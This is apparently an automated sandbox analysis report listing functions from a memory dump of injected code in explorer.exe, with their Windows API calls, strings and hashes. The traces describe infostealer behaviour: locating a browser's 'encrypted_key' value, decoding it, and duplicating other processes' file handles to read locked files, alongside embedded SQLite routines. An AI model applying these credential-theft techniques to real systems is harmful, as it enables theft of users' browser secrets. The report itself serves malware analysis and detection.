API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 9fde7c6df7796c44648614c18ede446c1d7a211e28932b3de015119eefa8bf83
Instruction ID: ac12e058b2c1ff65c8f7091b1b9bcb25b6275e49fa55d7089c265b81562826a7
Opcode Fuzzy Hash: 9fde7c6df7796c44648614c18ede446c1d7a211e28932b3de015119eefa8bf83
Instruction Fuzzy Hash: 83F0C8322042187BD2245A66DC88E7B7A5CEB876FAF260719F519A21C0DB1258155571

Function 02972FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02973E30,00000000,00000000,?,02973FA8), ref: 02972FC1
lstrlen.KERNEL32("encrypted_key":",?,02973FA8), ref: 02972FCE
StrStrIA.SHLWAPI("encrypted_key":",029C692C,?,02973FA8), ref: 02972FDD

Part of subcall function 0297190B: lstrlen.KERNEL32(?,?,?,?,00000000,02972783), ref: 0297192B
Part of subcall function 0297190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02972783), ref: 02971930
Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,?), ref: 02971946
Part of subcall function 0297190B: lstrcat.KERNEL32(00000000,00000000), ref: 0297194A

Strings

"encrypted_key":", xrefs: 02972FBA, 02972FBF, 02972FCD, 02972FDC

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: 148227af9989eb5a4559cd9fa5fa1a17d7cf3eccec37d478846ad5d7d4b72c71
Instruction ID: 88f4509f6ea7bd2b0a2c8508ea349750a607a4e489af0449d9f2184d1540c142
Opcode Fuzzy Hash: 148227af9989eb5a4559cd9fa5fa1a17d7cf3eccec37d478846ad5d7d4b72c71
Instruction Fuzzy Hash: 85E06822F4EB246F93257BB56C44D573F4C9EC6016314007CFA02C3203DF828401C3A0

Function 0297BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0297BB40

Strings

winDelete, xrefs: 0297BB6A

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: 4bf56c927b2f0fafcf3da76535a6eeea07a534aa1edd3b1e283ef80150fd1c99
Instruction ID: 17633e69bea3379eedd75fd3ad9307499b964dd20566c345440ad0398f8e26b4
Opcode Fuzzy Hash: 4bf56c927b2f0fafcf3da76535a6eeea07a534aa1edd3b1e283ef80150fd1c99
Instruction Fuzzy Hash: 0F112B32A04208EB9710AB74D861D7D777ADFD1768F10451DEC06D7288DB308901DB92

Function 02972EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02972EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02972F54
RegCloseKey.KERNELBASE(?), ref: 02972F62

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: 197784292fcb590f5baf92b27710ed104f584d5b9cebf40d91f745ab6ba67fa3
Instruction ID: ae3a932bb63578105be882b43219032986750858e3bceaf8b5504ee090c9231b
Opcode Fuzzy Hash: 197784292fcb590f5baf92b27710ed104f584d5b9cebf40d91f745ab6ba67fa3
Instruction Fuzzy Hash: 96016D31608250AB8719AF22DC04DBFBBAEEFC5350F00482DF859A2150DB358855EFA1

Function 02974B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02974B74
CoUninitialize.COMBASE ref: 02974B83
ExitProcess.KERNEL32 ref: 02974B8B

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: a124c0422c002de6bb91e072841d114a148b91cc100de969eda28187a2c765e8
Instruction ID: 8dc06b43198e24353171b80f197de2926d60d3d2c9d0ed5834315d39fdedb898
Opcode Fuzzy Hash: a124c0422c002de6bb91e072841d114a148b91cc100de969eda28187a2c765e8
Instruction Fuzzy Hash: 2CC09B35BCC1004BE7803BF15C0D72D363CAF85713F205804F205C5085DB5054108B27

Function 02979FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 02979FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0297A00E

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 65ee505431fcc51eb946997e34903bf08127695f8340688c782b2ae3d6bc08fc
Instruction ID: 3859ab2e1103a946b4d8bc710ea542e30badcaca25f1f0aa7f7b5a2152ab1535
Opcode Fuzzy Hash: 65ee505431fcc51eb946997e34903bf08127695f8340688c782b2ae3d6bc08fc
Instruction Fuzzy Hash: 72F09673B49341BAF7305A94AC84F7B679DD7CA795F104C29F946D6180E3716C408670

Function 02971AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02972E83,PathToExe,00000000,00000000), ref: 02971B16

Part of subcall function 02971011: GetProcessHeap.KERNEL32(00000000,00000000,?,02971A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2), ref: 02971020
Part of subcall function 02971011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971027

Part of subcall function 029719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A1E
Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A3C
Part of subcall function 029719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02971A75
Part of subcall function 029719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02971AE2,PortNumber,00000000,00000000), ref: 02971A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02971B40

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: efee3d14f04a60defe8eb8e7fdb03a219f27d93f34813207758da20fc36522ef
Instruction ID: 7a8eec509d5dabebd0e3120d41d7dd170647ead91627da984509bead7fb2a535
Opcode Fuzzy Hash: efee3d14f04a60defe8eb8e7fdb03a219f27d93f34813207758da20fc36522ef
Instruction Fuzzy Hash: ACF0E93774064867D711792EDC80E7B379FCBC22A6316002DF41DA3255EE23AC016674

Function 0297A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0297A35F

Strings

winSeekFile, xrefs: 0297A381

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: 42a4373da6a2620ad732c6c65a0990c2d8dd776401f7a8d90e63ca98f8c5fef9
Instruction ID: 92911f36db42592ce3aa6cf3d3521690da479a93e6187a1ad7276aebb851f0bb
Opcode Fuzzy Hash: 42a4373da6a2620ad732c6c65a0990c2d8dd776401f7a8d90e63ca98f8c5fef9
Instruction Fuzzy Hash: E2F0B431A15204AFE7119F65DC009BB77AEEB45321B10876AF865C62C0DB70DD509AA1

Function 02979EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(04C40000,00000000,?), ref: 02979EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02979ECD

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 605da4d5e4f62818a09a45f6004d1047eb3e760fce0d143a43129db8bb201c0b
Instruction ID: b18bcc6f0af28baf1c237dc6884d9b05b9ac6a730937e81f3953be745b759e46
Opcode Fuzzy Hash: 605da4d5e4f62818a09a45f6004d1047eb3e760fce0d143a43129db8bb201c0b
Instruction Fuzzy Hash: 97E0C273E882107BE6122684AC04F7FF769DBD4F10F010415FA04E7251C33098A1ABF2

Function 02979EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(04C40000,00000000,?), ref: 02979EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 02979F0E

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: ddba24ba13be8061e88dae7cfb92811c987972a2c4130f18a935476ca4917395
Instruction ID: 88f8d04f183fa0d4af05bc6f41fa84b947c8699443291eb8abd780957e4ca42e
Opcode Fuzzy Hash: ddba24ba13be8061e88dae7cfb92811c987972a2c4130f18a935476ca4917395
Instruction Fuzzy Hash: B8D01273A8C20177E7015A94AC05F3BB77D9BD5B04F450829F505D6066D36054A1BB72

Function 02971B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
CloseHandle.KERNELBASE(00000000), ref: 02971B8F

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 4adcb63b914fe2da99a9cd29f1737159bc6fefd4dd4277b7237f1026002d941e
Instruction ID: f792b0b6ef9e1b0d25a545afa439bacbda5044d1e72d6d7424ec5fa8b442ceb9
Opcode Fuzzy Hash: 4adcb63b914fe2da99a9cd29f1737159bc6fefd4dd4277b7237f1026002d941e
Instruction Fuzzy Hash: 12D01271657630A3D575563A7C0CEB76F1CEF435B9B140A18B41DE50C4E314889781E0

Function 02971000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: e3cd1e359f4fd2caa5772a41b5ce35e61201f8ae0651a1347714f4646171b716
Instruction ID: 0d3b46f57dac02d6b89e7e38052dfbc2e2f992e22e5a03dbcdd6d9fc9235b8f5
Opcode Fuzzy Hash: e3cd1e359f4fd2caa5772a41b5ce35e61201f8ae0651a1347714f4646171b716
Instruction Fuzzy Hash: C9A002B5D941045FDD4457A59A0DA3A391CFBC5703F204944714586141D96454148731

Function 029712A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 029712B5

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: 9215ba4536a6b33574ff223c8f723f6b97a9698697b7a9da27555bd32a696767
Instruction ID: a142683e93dc5a54c75a1b060d73b680f1555bcb9f649501ee7072d01ede9acc
Opcode Fuzzy Hash: 9215ba4536a6b33574ff223c8f723f6b97a9698697b7a9da27555bd32a696767
Instruction Fuzzy Hash: 5311DAB5E05209AFDB10DFA5D988ABEB7BDEF48651B104429F949E7240D730DA05CB60

Function 02971B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,02972C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02971BAA

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d33c955c56a01e1c2e7916c7f0ce2058cddf6600663b695f3f18e1f043ceca9f
Instruction ID: aaa5c4d8f1652882f8ac40c32e11ab26993f1f6c2ce1d3c1e107414698d25104
Opcode Fuzzy Hash: d33c955c56a01e1c2e7916c7f0ce2058cddf6600663b695f3f18e1f043ceca9f
Instruction Fuzzy Hash: AED0A933E06430838A745A3C38048A2A3886A8057832A07B8FC2AF30C8F324CC8242D0

Function 02971677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02971684

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: dca24fcdc79281043ddfa2cfa2f35f0c043adc0dc7d5e25a6b0dd8c84d29cd09
Instruction ID: b875c7ffe66bf0b51c4a1a5cf217fc61c5bf77227e768a7ba01d880d8b689040
Opcode Fuzzy Hash: dca24fcdc79281043ddfa2cfa2f35f0c043adc0dc7d5e25a6b0dd8c84d29cd09
Instruction Fuzzy Hash: C7C08C31564231DFE7301A308C09B8636D8EF09BB2F160D2AE0C5DD0C0E2F448C0CA90

Function 0297104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0297158A), ref: 02971056

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1e2b3fe165a567dd34bdffab384d8c4976ee422b3ed9f703356cdc64883f357f
Instruction ID: 346dcb85d2038499fb57c90731afbce45fb7e6768c9a7e07f0bc3b6385429cfa
Opcode Fuzzy Hash: 1e2b3fe165a567dd34bdffab384d8c4976ee422b3ed9f703356cdc64883f357f
Instruction Fuzzy Hash: 6BA002F0BD97007AFD699763AE2FF25293C9B80F12F200644B30D7C0C055E47510852D

Function 0297105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,02974A5B,?,?,00000000,?,?,?,?,02974B66,?), ref: 02971065

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5fee1cab5aff80f1a472fac60da91bfd48e21f32161ae0c04094ad40238b4bb2
Instruction ID: 30c854fc8b68b2d570b741b40c7b7fb66134257ae2df1f8ca9640018112ad22b
Opcode Fuzzy Hash: 5fee1cab5aff80f1a472fac60da91bfd48e21f32161ae0c04094ad40238b4bb2
Instruction Fuzzy Hash: F9A00271ED470066EDB457205D0AF2526186781B02F3049447241A91C149A5E0548B28

Non-executed Functions

Function 0297349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 029734C0

Part of subcall function 029733C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02973401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,029737A8), ref: 029734E9

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0297351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02973541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02973586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0297358F
lstrcmpiW.KERNEL32(00000000,File), ref: 029735B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 029735DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 029735F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02973606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0297361E
GetFileSize.KERNEL32(?,00000000), ref: 02973631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02973658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0297366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02973681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 029736AD
CloseHandle.KERNEL32(?), ref: 029736C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,029737A8), ref: 029736F5

Part of subcall function 02971C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02971CC0
Part of subcall function 02971C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02971CDA
Part of subcall function 02971C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02971CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,029737A8), ref: 02973707

Strings

File, xrefs: 029735B0

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 8f6fd0024ac87876eb0b57051941ba4bf714b37b28cdd75be0bc1b44355fb108
Instruction ID: 374bd6fb0b3e9bb1b8801f11e16e54e59e801d8c6cfb43c3c46efa43d330a152
Opcode Fuzzy Hash: 8f6fd0024ac87876eb0b57051941ba4bf714b37b28cdd75be0bc1b44355fb108
Instruction Fuzzy Hash: 7B61AE71A48300AFD7209F21CC85B2B7BEDFBC8765F20092CF946A6290D735D9549F59

Function 029C4438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 029C4502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 029C475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 029C4803

Strings

cach, xrefs: 029C46DC
%s mode not allowed: %s, xrefs: 029C47D0
access, xrefs: 029C4725
localhost, xrefs: 029C44FD
cache, xrefs: 029C46FA
no such vfs: %s, xrefs: 029C482F
no such %s mode: %s, xrefs: 029C4784
invalid uri authority: %.*s, xrefs: 029C4513
mode, xrefs: 029C4712
file, xrefs: 029C4474

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: 30b4632cb43ce7113dcf7f21af2cead72e234fee686b47e9dfc95df4a6223fe6
Instruction ID: addc268c9a7e1c5b54495f73b3650428ff2b90f4a19a2e33902bc440a2cb48a5
Opcode Fuzzy Hash: 30b4632cb43ce7113dcf7f21af2cead72e234fee686b47e9dfc95df4a6223fe6
Instruction Fuzzy Hash: 33C1F470B083819BDB34DF1884A077BBBE9AF89318F24292EE8D597295D734D445CB93

Function 02995F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 02976AAA: memset.NTDLL ref: 02976AC5

memset.NTDLL ref: 02995F53

Strings

cannot open view: %s, xrefs: 02995FF3
no such column: "%s", xrefs: 02996271
indexed, xrefs: 029960E8
cannot open virtual table: %s, xrefs: 02995FAA
cannot open %s column for writing, xrefs: 02996255
cannot open table without rowid: %s, xrefs: 02995FCF
foreign key, xrefs: 029960A3

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: 9cc413e9bdb50417a5479107ecb248c969dad934676916e4e34a77d11a874eba
Instruction ID: d7bb208d48197906b4b81ce3ac49f6f830bb0b8bedd5a7c950e9e3e4beb3aa6a
Opcode Fuzzy Hash: 9cc413e9bdb50417a5479107ecb248c969dad934676916e4e34a77d11a874eba
Instruction Fuzzy Hash: C5C16D71A047019FDB14DF29C480A2EB7EABFC8724F14892DF89597281E731E956CF92

Function 02972112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 02972127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 0297213A
wsprintfA.USER32 ref: 0297214F

Strings

%li, xrefs: 02972149

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: 2c813fdfaf3a0f1e1011c54f532fa07aff0796e582ad34f8a850319c7386061f
Instruction ID: dc5a842b50af01dece1ed43124738670e83de8b6b75dcf3c0a86290319386c29
Opcode Fuzzy Hash: 2c813fdfaf3a0f1e1011c54f532fa07aff0796e582ad34f8a850319c7386061f
Instruction Fuzzy Hash: 23E09232A4020877D7203BA89C06EBE7B6DDB80A56F104595FA04B2281D5729A2487D5

Function 0297123B Relevance: 4.5, APIs: 3, Instructions: 49encryptionstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02973E4B,00000000), ref: 0297124A
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971268

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02971295

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcesslstrlen
String ID:
API String ID: 117552131-0
Opcode ID: 19b969e945ee68b53dd01f98b0664795b2f6f3bc2349bd488ae548df9d41be99
Instruction ID: 626a02bfc40a176afbfc5fd98398beb96c9cb6569f876f7d93d3eaf3c0fbda0a
Opcode Fuzzy Hash: 19b969e945ee68b53dd01f98b0664795b2f6f3bc2349bd488ae548df9d41be99
Instruction Fuzzy Hash: 8801A271604305AFE318CF16CC89FBBB7ACEB81665F00462EF505D2240DBA1DC018A70

Function 029711E1 Relevance: 4.5, APIs: 3, Instructions: 46encryptionstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,774CF360,00000000,?,00000000,?,029746E3), ref: 029711ED
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0297120F

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02971231

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcesslstrlen
String ID:
API String ID: 117552131-0
Opcode ID: 5307bc7506f8ee82ac1e42f04ef99a4d68e14ec135034389f5e513933e8f97a5
Instruction ID: d06882be6f079006b9d9a6265473a2268adb510602ffada15e043a380915cb81
Opcode Fuzzy Hash: 5307bc7506f8ee82ac1e42f04ef99a4d68e14ec135034389f5e513933e8f97a5
Instruction Fuzzy Hash: 45F0907260830E7BE2109E56DC80FB7BB9DDFD16A8F15042EB601D2181DEA2ED0986B4

